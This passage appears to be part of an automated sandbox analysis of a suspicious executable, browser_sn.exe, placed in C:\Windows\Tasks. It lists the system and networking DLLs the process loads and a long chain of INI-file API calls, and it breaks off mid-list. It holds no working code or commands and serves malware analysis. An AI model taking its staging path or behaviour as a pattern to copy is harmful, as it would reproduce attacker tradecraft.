Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: riched20.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: usp10.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: msls31.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winmm.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: userenv.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wtsapi32.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dwmapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: winrnr.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll | |
Source: C:\Windows\Tasks\browser_sn.exe | Code function: 24_2_00007FF790C381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivatePro |